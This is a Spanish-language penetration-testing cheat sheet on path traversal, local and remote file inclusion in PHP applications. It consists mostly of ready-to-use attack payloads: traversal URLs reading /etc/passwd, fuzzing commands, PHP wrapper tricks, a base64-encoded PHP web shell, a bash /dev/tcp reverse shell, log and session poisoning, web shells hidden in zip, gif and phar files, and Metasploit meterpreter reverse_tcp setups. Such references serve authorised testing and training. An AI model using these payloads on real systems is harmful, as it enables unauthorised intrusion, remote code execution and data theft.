# Path traversal & file inclusion ## Path traversal ```sh http:///index.php?page=../../..// http:///index.php?page=../../../etc/passwd http:///index.php?page=../../../windows/win.ini ``` ### Null byte Omite la adición de caracteres al final de la cadena proporcionada. ```sh http:///index.php?page=../../../etc/passwd%00 ``` ## Local File Inclusion (LFI) ### Payloads #### Linux/Unix * * #### Windows * **SecLists** * ### Fuerza bruta #### Wfuzz ```sh wfuzz -u http:///index.php?page=../../../../../../FUZZ -w --hw 0 -c ``` * -u = URL. * \ = objetivo. * FUZZ = la palabra `FUZZ` será reemplazada con los valores de la wordlist. * -w = wordlist. * \ = ruta de wordlist Local File Inclusion (LFI). * \--hw 0 = ocultar respuestas con 0 (cero) palabras. * -c = output con colores. #### FFuF ```sh ffuf -u http:///index.php?page=FUZZ -w :FUZZ ``` * -u = URL. * \ = objetivo. * FUZZ = la palabra `FUZZ` será reemplazada con los valores de la wordlist. * -w = wordlist. * \ = ruta de wordlist. ### PHP wrappers #### Wrapper php\://filter ```sh # base64 http:///index.php?page=php://filter/read=convert.base64-encode/resource=../../..// # ROT13 http:///index.php?page=php://filter/read=string.rot13/resource=../../..// ``` #### Wrapper data:// Es posible utilizar este wrapper solo si la opción `allow_url_include` está habilitada en la configuración de PHP. ```sh http:///index.php?page=data://text/plain, http:///index.php?page=data://text/plain, ``` ### Local File Inclusion (LFI) a Remote Code Execution (RCE) #### Wrapper expect:// Este wrapper está deshabilitado de forma predeterminada. ```sh http:///index.php?page=expect://id ``` #### Wrapper input:// Es posible utilizar este wrapper solo si la opción `allow_url_include` está habilitada en la configuración de PHP. ```sh curl -s -X POST --data "" "http:///index.php?page=php://input" | grep uid ``` {% code title="Request" %} ``` POST /index.php?page=php://input Host: ``` {% endcode %} #### Wrapper data:// Es posible utilizar este wrapper solo si la opción `allow_url_include` está habilitada en la configuración de PHP. ``` http:///index.php?page=data://text/plain, http:///index.php?page=data://text/plain;base64, ``` Ejemplo de web shell (base64). ```sh # Web shell (PHP) echo '' | base64 # Web shell (PHP) en base64 PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= # Payload final http:///index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id ``` Ejemplo de reverse shell (base64). ```sh # Reverse shell (Bash) bash -c 'bash -i >& /dev/tcp// 0>&1' # Reverse shell (Bash) en base64 YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC97SVAtQWRkcmVzc30ve3BvcnR9IDA+JjEn # Payload final http:///index.php?page=data://text/plain;base64,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC97SVAtQWRkcmVzc30ve3BvcnR9IDA+JjEn ``` #### File upload 1\) Wrapper zip\:// Generación de archivo `.zip` con web shell. ```sh echo '' > webshell.php zip webshell.zip webshell.php rm webshell.php ``` Subir archivo `webshell.zip` al servidor web objetivo. Es posible hacer referencia a los archivos dentro del archivo `webshell.zip` con el simbolo `#`. ```sh # Sin URL encode http:///index.php?page=zip://webshell.zip#cmd.php&cmd=id # Con URL endoce http:///index.php?page=zip://webshell.zip%23cmd.php&cmd=id ``` 2\) Archivo de imagen. Generación de archivo `webshell.gif` con web shell. ```sh echo 'GIF8' > webshell.gif ``` Subir archivo `webshell.gif` al servidor web objetivo y realizar su ejecución desde el Local File Inclusion (LFI) identificado. ```sh http:///index.php?page=webshell.gif&cmd=id ``` 3\) Wrapper phar:// {% code title="webshell.php" %} ```php startBuffering(); $phar->addFromString('webshell.txt', ''); $phar->setStub(''); $phar->stopBuffering(); ?> ``` {% endcode %} Generación de archivo `.phar` desde `webshell.php` y cambio de extensión a `.jpg`. ```sh php --define phar.readonly=0 webshell.php mv webshell.phar webshell.jpg ``` Subir archivo `webshell.jpg` al servidor web objetivo y realizar su ejecución desde el Local File Inclusion (LFI) identificado. ```sh http:///index.php?page=phar://webshell.jpg/webshell.txt&cmd=id ``` #### Log poisoning Archivos de logs: * /var/log/apache2/access.log * /var/log/nginx/access.log * /var/log/sshd.log * /var/log/mail * /var/log/vsftpd.log * /proc/self/environ {% code title="Request" %} ``` GET /index.php?page= Host: User-Agent: ``` {% endcode %} ```sh http:///index.php?page=&cmd=id ``` #### Archivos de sesión de PHP Rutas de almacenamiento de archivos de sesión de PHP: * /var/lib/php/sessions/ * C:\Windows\Temp Ejemplo para `PHPSESSID` con valor `ujllfv2j2sm7ae11is401hvdf9`. ```sh http:///index.php?page=/sess_ujllfv2j2sm7ae11is401hvdf9 ``` Modificación de alguno de los valores almacenados en la sesión por: ```php ``` Ejecución de comandos. ```sh http:///index.php?page=/sess_ujllfv2j2sm7ae11is401hvdf9&cmd=id ``` ## Remote File Inclusion (RFI) Para incluir un archivo remoto en PHP, las opciones `allow_url_fopen` (habilitada de forma predeterminada) y `allow_url_include` deben estar activadas en la configuración. ```sh http:///index.php?page=http:// http:///index.php?page=http://www.google.com ``` ### Remote File Inclusion (RFI) a Remote Code Execution (RCE) Creación de webshell. {% code title="webshell.php" %} ```php ``` {% endcode %} #### HTTP Habilitación de servidor HTTP para compartir el archivo `webshell.php`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Ejecución de comandos. ```sh http:///index.php?page=http:///webshell.php&cmd=id ``` #### FTP Habilitación de servidor FTP para compartir el archivo `webshell.php`. ```sh python3 -m pyftpdlib -p 21 ``` Ejecución de comandos. ```sh http:///index.php?page=ftp:///webshell.php&cmd=id ``` #### SMB Cuando la aplicación se ejecuta en Windows, las restricciones aplicadas por `allow_url_include` pueden omitirse mediante el uso del protocolo SMB. Esto se debe a que Windows trata los archivos de los servidores SMB remotos como archivos normales, a los que se puede hacer referencia directamente con una ruta UNC (Universal Naming Convention). Habilitación de servidor SMB para compartir el archivo `webshell.php`. ```sh impacket-smbserver -smb2support share $(pwd) ``` Ejecución de comandos. ```sh http:///index.php?page=\\\webshell.php&cmd=id ``` ### Metasploit ```sh msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe > shell.exe ``` ```sh use unix/webapp/php_include set RHOST set PHPURI /index.php?page=XXpathXX set PAYLOAD php/meterpreter/reverse_tcp set LHOST set LPORT 4444 exploit # Desde sesión de meterpreter upload shell.exe ``` ```sh use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST set LPORT 5555 exploit -j ``` ```sh use unix/webapp/php_include set PAYLOAD php/exec set CMD shell.exe exploi ```